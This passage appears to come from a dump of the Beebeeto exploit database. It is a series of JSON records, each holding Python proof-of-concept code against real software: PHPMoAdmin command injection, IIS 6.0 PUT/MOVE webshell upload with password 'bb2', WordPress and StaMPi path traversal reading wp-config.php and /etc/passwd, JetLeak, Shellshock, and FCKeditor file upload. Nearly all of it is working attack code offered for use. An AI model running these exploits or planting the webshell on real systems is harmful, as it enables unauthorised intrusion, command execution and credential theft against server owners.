'PHPMoAdmin /moadmin.php \u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e (0-Day) POC',\r\n 'author': 'foundu',\r\n 'create_date': '2015-03-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'PHPMoAdmin',\r\n 'vul_version': ['*'],\r\n 'type': 'Command Execution',\r\n 'tag': ['PHPMoAdmin\u6f0f\u6d1e', 'PHPMoAdmin\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c', '/moadmin.php', 'php'],\r\n 'desc': 'PHPMoAdmin is a MongoDB administration tool for PHP built on a\\\r\n stripped-down version of the Vork high-performance framework.',\r\n 'references': ['http://seclists.org/fulldisclosure/2015/Mar/19',\r\n ],\r\n },\r\n }\r\n\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n file_path = ['/moadmin.php', '/moadmin/moadmin.php', '/wu-moadmin/wu-moadmin.php']\r\n for f in file_path:\r\n verify_url = args['options']['target'] + f\r\n command = {'object': '''1;system('echo -n \"beebeeto\"|md5sum;');exit''',}\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = requests.post(verify_url, data=command).content\r\n if 
'595bb9ce8726b4b55f538d3ca0ddfd76' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['post_content'] = \"object=1;system('command');exit\"\r\n return args\r\n continue\r\n return args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "PHPMoAdmin is a MongoDB administration tool for PHP built on a\r\nstripped-down version of the Vork high-performance framework.", "app_name": "PHPMoAdmin", "id": "poc-2015-0044", "layer4_protocol": null}
{"create_date": "2015-03-03 10:51:31", "name": "IIS 6.0 PUT \u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e Exploit", "level": "\u9ad8\u5371", "batchable": 1, "author": "1024", "rank": 2, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u521b\u5efa", "tag": "IIS PUT \u6f0f\u6d1e,IIS,IIS\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20,IIS\u8001\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport requests\r\nimport urlparse\r\nimport httplib\r\nimport sys\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0043',\r\n 'name': 'IIS 6.0 PUT \u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e Exploit',\r\n 'author': '1024',\r\n 'create_date': '2015-03-03',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'IIS',\r\n 'vul_version': ['6.0'],\r\n 'type': 'Arbitrary File Creation',\r\n 'tag': ['IIS PUT \u6f0f\u6d1e', 'IIS', 'IIS\u4efb\u610f\u6587\u4ef6\u4e0a\u4f20', 'IIS\u8001\u6f0f\u6d1e'],\r\n 'desc': \"IIS\u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e\u3002\",\r\n 'references': ['http://www.lijiejie.com/python-iis-put-file/',\r\n ],\r\n },\r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n verify_url = args['options']['target']\r\n if verify_url.startswith(('http://', 'https://')):\r\n verify_url = urlparse.urlparse(verify_url).netloc\r\n if args['options']['verbose']:\r\n print '[*] Detection server type...'\r\n conn = httplib.HTTPConnection(verify_url)\r\n conn.request(method='OPTIONS', url='/')\r\n headers = dict(conn.getresponse().getheaders())\r\n if args['options']['verbose']:\r\n 
if headers.get('server', '').find('Microsoft-IIS') < 0:\r\n print '[-] This is not an IIS web server'\r\n if 'public' in headers and \\\r\n headers['public'].find('PUT') > 0 and \\\r\n headers['public'].find('MOVE') > 0:\r\n conn.close()\r\n conn = httplib.HTTPConnection(verify_url)\r\n # PUT hack.txt\r\n conn.request( method='PUT', url='/hack.txt', body='<%execute(request(\"bb2\"))%>' )\r\n conn.close()\r\n conn = httplib.HTTPConnection(verify_url)\r\n # mv hack.txt to hack.asp\r\n conn.request(method='MOVE', url='/hack.txt', headers={'Destination': '/hack.asp'})\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n args['poc_ret']['webshell'] = '%s/hack.txt' % verify_url\r\n args['poc_ret']['password'] = 'bb2'\r\n return args\r\n args['poc_ret']['false'] = '[-] Server not vulnerable'\r\n return args\r\n\r\n exploit = verify\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "IIS\u914d\u7f6e\u4e0d\u5f53\u5bfc\u81f4\u7684\u4efb\u610f\u6587\u4ef6\u521b\u5efa\u6f0f\u6d1e\u3002", "app_name": "IIS", "id": "poc-2015-0043", "layer4_protocol": null}
{"create_date": "2015-03-02 15:12:41", "name": "Wordpress CodeArt Google MP3 Player Plugin <=1.0.11 /direct_download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d", "tag": "Wordpress CodeArt Google MP3 Player\u63d2\u4ef6\u6f0f\u6d1e,/direct_download.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = { \r\n # poc\u76f8\u5173\u4fe1\u606f \r\n 'poc': { \r\n 'id': 'poc-2015-0041',\r\n 'name': 'Wordpress CodeArt Google MP3 Player Plugin <=1.0.11 /direct_download.php \u4efb\u610f\u6587\u4ef6\u4e0b\u8f7d\u6f0f\u6d1e POC',\r\n 'author': 'Tiny',\r\n 'create_date': '2015-03-01',\r\n }, \r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f \r\n 'protocol': { \r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n }, \r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f \r\n 'vul': { \r\n 'app_name': 'Wordpress',\r\n 'vul_version': ['<=1.0.11',], \r\n 'type': 'Arbitrary File Download',\r\n 'tag': ['Wordpress CodeArt Google MP3 Player\u63d2\u4ef6\u6f0f\u6d1e', '/direct_download.php','php'],\r\n 'desc': '''\r\n Wordpress CodeArt Google MP3 Player Plugin has file download in\r\n do/direct_download.php.\r\n ''',\r\n 'references': ['http://www.exploit-db.com/exploits/35460/', \r\n ], \r\n }, \r\n }\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n payload = 'file=../../../wp-config.php'\r\n path = '/wp-content/plugins/google-mp3-audio-player/direct_download.php?'\r\n verify_url = args['options']['target'] + path + payload\r\n request = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + 
verify_url\r\n response = urllib2.urlopen(request)\r\n reg = re.compile(\"DB_PASSWORD\")\r\n if reg.findall(response.read()):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n \r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "Wordpress CodeArt Google MP3 Player Plugin has file download in do/direct_download.php.", "app_name": "WordPress", "id": "poc-2015-0041", "layer4_protocol": null}
{"create_date": "2015-03-02 15:07:11", "name": "WordPress UnGallery plugin <= 1.5.8 /source_vuln.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "WordPress UnGallery plugin\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b,source_vuln.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0040',\r\n 'name': 'WordPress UnGallery plugin <= 1.5.8 /source_vuln.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'Tiny',\r\n 'create_date': '2015-03-01',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'WordPress',\r\n 'vul_version': ['<=1.5.8'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['WordPress UnGallery plugin\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b', 'source_vuln.php', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/wp-content/plugins/ungallery/source_vuln.php',\r\n 'references': ['http://www.exploit-db.com/exploits/17704/',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../../../etc/passwd%00'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:x:0:0:root:/root:/bin/bash' in content:\r\n 
args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/wp-content/plugins/ungallery/source_vuln.php", "app_name": "WordPress", "id": "poc-2015-0040", "layer4_protocol": null}
{"create_date": "2015-02-26 14:04:17", "name": "Jetty Web Server 9.2.x-9.3.x \u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e [CVE-2015-2080] POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "user1018", "rank": 5, "port": null, "vul_type": "\u5176\u4ed6\u7c7b\u578b", "tag": "Jetty Web Server\u6f0f\u6d1e,CVE-2015-2080,\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport ssl\r\nimport sys\r\nimport urllib\r\nimport httplib\r\nimport urllib2\r\nimport string\r\nimport getopt\r\n\r\nfrom urlparse import urlparse\r\n\r\nfrom baseframe import BaseFrame\r\nfrom utils.http.forgeheaders import ForgeHeaders\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0037',\r\n 'name': 'Jetty Web Server 9.2.x-9.3.x \u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e [CVE-2015-2080] POC',\r\n 'author': 'user1018',\r\n 'create_date': '2015-02-26',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'Jetty Web Server',\r\n 'vul_version': ['9.2.8'],\r\n 'type': 'Other',\r\n 'tag': ['Jetty Web Server\u6f0f\u6d1e', 'CVE-2015-2080', '\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e'],\r\n 'desc': '''\r\n GDS\u5b89\u5168\u516c\u53f8\u53d1\u73b0\u4e86\u4e00\u4e2aJetty web server\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e\uff0c\r\n 
\u901a\u8fc7\u8be5\u6f0f\u6d1e\u4e00\u4e2a\u6ca1\u6709\u8ba4\u8bc1\u8fc7\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fdc\u7a0b\u83b7\u53d6\u4e4b\u524d\u5408\u6cd5\u7528\u6237\u5411\u670d\u52a1\u5668\u53d1\u9001\u7684\u8bf7\u6c42\u3002\r\n \u7b80\u800c\u8a00\u4e4b\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4ece\u5b58\u5728\u6f0f\u6d1e\u7684\u670d\u52a1\u5668\u8fdc\u7a0b\u83b7\u53d6\u7f13\u5b58\u533a\u7684\u654f\u611f\u4fe1\u606f\uff0c\r\n \u5305\u62echttp\u5934\u7684\u4fe1\u606f\uff08cookies\u3001\u8ba4\u8bc1\u7684tokens\u3001\u9632\u6b62CSRF\u7684tokens\u7b49\u7b49\uff09\u4ee5\u53ca\u7528\u6237POST\u7684\u6570\u636e\uff08\u7528\u6237\u540d\u3001\u5bc6\u7801\u7b49\uff09\u3002\r\n\r\n \u6f0f\u6d1e\u7684\u6839\u6e90\u5728\u4e8e\u5f53header\u4e2d\u88ab\u63d2\u5165\u6076\u610f\u7684\u5b57\u7b26\u5e76\u63d0\u4ea4\u5230\u670d\u52a1\u5668\u540e\uff0c\u4f1a\u4ece\u5f02\u5e38\u5904\u7406\u4ee3\u7801\u4e2d\u83b7\u5f97\u5171\u4eab\u7f13\u51b2\u533a\u5927\u7ea616\r\n bytes\u7684\u6570\u636e\u3002\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u4e00\u4e2a\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u6765\u83b7\u53d6\u5f02\u5e38\u5e76\u504f\u79fb\u5230\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\uff0c\r\n \u5171\u4eab\u7f13\u51b2\u533a\u4e2d\u5b58\u7684\u662f\u7528\u6237\u5148\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0cJetty\u670d\u52a1\u5668\u4f1a\u6839\u636e\u7528\u6237\u63d0\u4ea4\u7684\u8bf7\u6c42\u8fd4\u56de\u5927\u7ea616\r\n bytes\u7684\u6570\u636e\u5757\uff0c\u8fd9\u91cc\u9762\u4f1a\u5305\u542b\u654f\u611f\u4fe1\u606f\u3002\r\n ''',\r\n 'references': [\r\n 'http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html',\r\n 'https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py'\r\n 'http://bobao.360.cn/news/detail/1251.html',\r\n ],\r\n },\r\n }\r\n\r\n\r\n def _init_user_parser(self):\r\n self.user_parser.add_option('-p','--port',\r\n action='store', dest='port', type='string', default='80',\r\n 
help='Use port. Default: 80')\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n '''\r\n Github Author: Gotham Digital Science\r\n Purpose: This tool is intended to provide a quick-and-dirty way for organizations to test whether\r\n their Jetty web server versions are vulnerable to JetLeak. Currently, this script does\r\n not handle sites with invalid SSL certs. This will be fixed in a future iteration.\r\n '''\r\n\r\n conn = None\r\n verify_url = urlparse(args['options']['target'])\r\n port = args['options']['port']\r\n fake_headers = ForgeHeaders().get_headers()\r\n\r\n if verify_url.scheme == \"https\":\r\n conn = httplib.HTTPSConnection(verify_url.netloc + \":\" + port)\r\n elif verify_url.scheme == \"http\":\r\n conn = httplib.HTTPConnection(verify_url.netloc + \":\" + port)\r\n else:\r\n args['poc_ret']['Error'] = \"Error: Only 'http' or 'https' URL Schemes Supported\"\r\n return args\r\n\r\n if args['options']['verbose']:\r\n print '[*] Connect: %s ...' % verify_url.netloc\r\n\r\n try:\r\n x = '\\x00'\r\n fake_headers['Referer'] = x\r\n conn.request('POST', '/', '', fake_headers)\r\n r1 = conn.getresponse()\r\n except:\r\n return args\r\n\r\n if (r1.status == 400 and (\"Illegal character 0x0 in state\" in r1.reason)):\r\n args['success'] = True\r\n args['poc_ret']['vul_url'] = '%s:%s' % (verify_url, port)\r\n args['poc_ret']['headers'] = fake_headers\r\n return args\r\n return args\r\n\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "GDS\u5b89\u5168\u516c\u53f8\u53d1\u73b0\u4e86\u4e00\u4e2aJetty web 
server\u5171\u4eab\u7f13\u5b58\u533a\u8fdc\u7a0b\u6cc4\u9732\u6f0f\u6d1e\uff0c\r\n\u901a\u8fc7\u8be5\u6f0f\u6d1e\u4e00\u4e2a\u6ca1\u6709\u8ba4\u8bc1\u8fc7\u7684\u653b\u51fb\u8005\u53ef\u4ee5\u8fdc\u7a0b\u83b7\u53d6\u4e4b\u524d\u5408\u6cd5\u7528\u6237\u5411\u670d\u52a1\u5668\u53d1\u9001\u7684\u8bf7\u6c42\u3002\r\n\u7b80\u800c\u8a00\u4e4b\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u4ece\u5b58\u5728\u6f0f\u6d1e\u7684\u670d\u52a1\u5668\u8fdc\u7a0b\u83b7\u53d6\u7f13\u5b58\u533a\u7684\u654f\u611f\u4fe1\u606f\uff0c\r\n\u5305\u62echttp\u5934\u7684\u4fe1\u606f\uff08cookies\u3001\u8ba4\u8bc1\u7684tokens\u3001\u9632\u6b62CSRF\u7684tokens\u7b49\u7b49\uff09\u4ee5\u53ca\u7528\u6237POST\u7684\u6570\u636e\uff08\u7528\u6237\u540d\u3001\u5bc6\u7801\u7b49\uff09\u3002\r\n\r\n\u6f0f\u6d1e\u7684\u6839\u6e90\u5728\u4e8e\u5f53header\u4e2d\u88ab\u63d2\u5165\u6076\u610f\u7684\u5b57\u7b26\u5e76\u63d0\u4ea4\u5230\u670d\u52a1\u5668\u540e\uff0c\u4f1a\u4ece\u5f02\u5e38\u5904\u7406\u4ee3\u7801\u4e2d\u83b7\u5f97\u5171\u4eab\u7f13\u51b2\u533a\u5927\u7ea616\r\nbytes\u7684\u6570\u636e\u3002\u56e0\u6b64\u653b\u51fb\u8005\u53ef\u4ee5\u901a\u8fc7\u63d0\u4ea4\u4e00\u4e2a\u7cbe\u5fc3\u6784\u9020\u7684\u8bf7\u6c42\u6765\u83b7\u53d6\u5f02\u5e38\u5e76\u504f\u79fb\u5230\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\uff0c\r\n\u5171\u4eab\u7f13\u51b2\u533a\u4e2d\u5b58\u7684\u662f\u7528\u6237\u5148\u524d\u63d0\u4ea4\u7684\u6570\u636e\uff0cJetty\u670d\u52a1\u5668\u4f1a\u6839\u636e\u7528\u6237\u63d0\u4ea4\u7684\u8bf7\u6c42\u8fd4\u56de\u5927\u7ea616\r\nbytes\u7684\u6570\u636e\u5757\uff0c\u8fd9\u91cc\u9762\u4f1a\u5305\u542b\u654f\u611f\u4fe1\u606f\u3002", "app_name": "Jetty Web Server", "id": "poc-2015-0037", "layer4_protocol": null}
{"create_date": "2015-02-19 10:38:44", "name": "StaMPi /path/fotogalerie.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC", "level": "\u4e2d\u5371", "batchable": 1, "author": "Tiny", "rank": 3, "port": null, "vul_type": "\u672c\u5730\u6587\u4ef6\u5305\u542b", "tag": "StaMPi\u6f0f\u6d1e,\u672c\u5730\u6587\u4ef6\u5305\u542b,/path/fotogalerie.php,php", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport re\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0035',\r\n 'name': 'StaMPi /path/fotogalerie.php \u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e POC',\r\n 'author': 'Tiny',\r\n 'create_date': '2015-02-16',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'StaMPi',\r\n 'vul_version': ['*'],\r\n 'type': 'Local File Inclusion',\r\n 'tag': ['StaMPi\u6f0f\u6d1e', '\u672c\u5730\u6587\u4ef6\u5305\u542b', '/path/fotogalerie.php', 'php'],\r\n 'desc': '\u6f0f\u6d1e\u6587\u4ef6\uff1a/path/fotogalerie.php',\r\n 'references': ['http://www.exploit-db.com/exploits/36031/',\r\n ],\r\n },\r\n }\r\n\r\n \r\n @classmethod\r\n def verify(cls, args):\r\n payload = '/fotogalerie.php?id=../../../../../../../../../../etc/passwd%00'\r\n verify_url = args['options']['target'] + payload\r\n req = urllib2.Request(verify_url)\r\n if args['options']['verbose']:\r\n print '[*] Request URL: ' + verify_url\r\n content = urllib2.urlopen(req).read()\r\n if 'root:x:0:0:root:/root:/bin/bash' in content:\r\n args['success'] = True\r\n args['poc_ret']['vul_url']= verify_url\r\n return args\r\n\r\n exploit = verify\r\n \r\n \r\nif 
__name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": "\u6f0f\u6d1e\u6587\u4ef6\uff1a/path/fotogalerie.php", "app_name": "Other", "id": "poc-2015-0035", "layer4_protocol": null}
{"create_date": "2015-02-15 17:20:25", "name": "GNU Bash <= 4.3 Shockshell \u7834\u58f3\u6f0f\u6d1e POC", "level": "\u9ad8\u5371", "batchable": 1, "author": "Tommy", "rank": 3, "port": null, "vul_type": "\u547d\u4ee4\u6267\u884c", "tag": "bash\u6f0f\u6d1e,CVE-2014-6271,ShellShock\u7834\u58f3\u6f0f\u6d1e,cgi", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding=utf-8\r\n\r\n\"\"\"\r\nSite: http://www.beebeeto.com/\r\nFramework: https://github.com/n0tr00t/Beebeeto-framework\r\n\"\"\"\r\n\r\nimport md5\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc': {\r\n 'id': 'poc-2015-0032',\r\n 'name': 'GNU Bash <= 4.3 Shockshell \u7834\u58f3\u6f0f\u6d1e POC',\r\n 'author': 'Tommy',\r\n 'create_date': '2015-02-12',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol': {\r\n 'name': 'http',\r\n 'port': [80],\r\n 'layer4_protocol': ['tcp'],\r\n },\r\n # \u6f0f\u6d1e\u76f8\u5173\u4fe1\u606f\r\n 'vul': {\r\n 'app_name': 'bash',\r\n 'vul_version': ['<=4.3'],\r\n 'type': 'Command Execution',\r\n 'tag': ['bash\u6f0f\u6d1e', 'CVE-2014-6271', 'ShellShock\u7834\u58f3\u6f0f\u6d1e', 'cgi'],\r\n 'desc': '\u6267\u884cshell\u547d\u4ee4\uff0c\u4ece\u800c\u5bfc\u81f4\u4fe1\u606f\u6cc4\u6f0f\u3001\u672a\u6388\u6743\u7684\u6076\u610f\u4fee\u6539\u3001\u670d\u52a1\u4e2d\u65ad',\r\n 'references': [\r\n 'http://www.exploit-db.com/exploits/34765/',\r\n 'http://blog.knownsec.com/2014/09/shellshock_response_profile/',\r\n ],\r\n },\r\n }\r\n\r\n\r\n '''\r\n GNU Bash 4.3\u53ca\u4e4b\u524d\u7248\u672c\u5728\u8bc4\u4f30\u67d0\u4e9b\u6784\u9020\u7684\u73af\u5883\u53d8\u91cf\u65f6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\r\n 
\u5411\u73af\u5883\u53d8\u91cf\u503c\u5185\u7684\u51fd\u6570\u5b9a\u4e49\u540e\u6dfb\u52a0\u591a\u4f59\u7684\u5b57\u7b26\u4e32\u4f1a\u89e6\u53d1\u6b64\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6539\u53d8\u6216\u7ed5\u8fc7\u73af\u5883\u9650\u5236\uff0c\r\n \u4ee5\u6267\u884cShell\u547d\u4ee4\u3002\u67d0\u4e9b\u670d\u52a1\u548c\u5e94\u7528\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u63d0\u4f9b\u73af\u5883\u53d8\u91cf\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u3002\r\n \u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5728\u8c03\u7528Bash Shell\u4e4b\u524d\u53ef\u4ee5\u7528\u6784\u9020\u7684\u503c\u521b\u5efa\u73af\u5883\u53d8\u91cf\u3002\r\n \u8fd9\u4e9b\u53d8\u91cf\u53ef\u4ee5\u5305\u542b\u4ee3\u7801\uff0c\u5728Shell\u88ab\u8c03\u7528\u540e\u4f1a\u88ab\u7acb\u5373\u6267\u884c\u3002\r\n '''\r\n\r\n @classmethod\r\n def verify(cls, args):\r\n\tip = args['options']['target']\r\n\topener = urllib2.build_opener()\r\n\t# Modify User-agent header value for Shell Shock test\r\n\topener.addheaders = [\r\n ('User-agent', '() { :;}; echo Content-Type: text/plain ; echo \"1a8b8e54b53f63a8efae84e064373f19:\"'),\r\n\t\t\t\t('Accept','text/plain'),\r\n\t\t\t\t('Content-type','application/x-www-form-urlencoded'),\r\n\t\t\t\t('Referer','http://www.baidu.com')\r\n\t\t\t\t]\r\n\ttry:\r\n\t\tURL = ip\r\n\t\tresponse = opener.open(URL)\r\n\t\theaders = response.info()\r\n\t\tstatus = response.getcode()\r\n\t\topener.close()\r\n\t\tif status==200:\r\n\t\t\tif \"1a8b8e54b53f63a8efae84e064373f19\" in headers:\r\n\t\t\t\targs['success'] = True\r\n\t\t\t\targs['poc_ret']['vul_url'] = URL\r\n\t\t\telse:\r\n\t\t\t\targs['success'] = False\r\n\t\treturn args\r\n\t\t\r\n\texcept Exception as e:\r\n\t\topener.close()\r\n\t\targs['success'] = False\r\n\t\treturn args\r\n\r\n exploit = verify\r\n\r\n\r\nif __name__ == '__main__':\r\n from pprint import pprint\r\n\r\n mp = MyPoc()\r\n pprint(mp.run())", "desc": 
"\u6267\u884cshell\u547d\u4ee4\uff0c\u4ece\u800c\u5bfc\u81f4\u4fe1\u606f\u6cc4\u6f0f\u3001\u672a\u6388\u6743\u7684\u6076\u610f\u4fee\u6539\u3001\u670d\u52a1\u4e2d\u65ad", "app_name": "bash", "id": "poc-2015-0032", "layer4_protocol": null}
{"create_date": "2015-02-09 22:57:18", "name": "FCKeditor <= 2.4.3 /upload.asp File Upload POC & Exploit", "level": "\u4e2d\u5371", "batchable": 0, "author": "r0gent", "rank": 3, "port": null, "vul_type": "\u6587\u4ef6\u4e0a\u4f20", "tag": "FCKeditor\u6f0f\u6d1e,FCK\u7f16\u8f91\u5668\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e,asp,php,aspx", "path": null, "protocol": null, "source_code": "#!/usr/bin/env python\r\n# coding:utf-8\r\n\r\n\r\nimport re\r\nimport socket\r\nimport urllib2\r\n\r\nfrom baseframe import BaseFrame\r\n\r\nclass MyPoc(BaseFrame):\r\n poc_info = {\r\n # poc\u76f8\u5173\u4fe1\u606f\r\n 'poc' : {\r\n 'id' : 'poc-2015-0031',\r\n 'name' : 'FCKeditor <= 2.4.3 /upload.asp File Upload POC & Exploit',\r\n 'author' : 'r0gent',\r\n 'create_date' : '2015-02-04',\r\n },\r\n # \u534f\u8bae\u76f8\u5173\u4fe1\u606f\r\n 'protocol' : {\r\n 'name' : 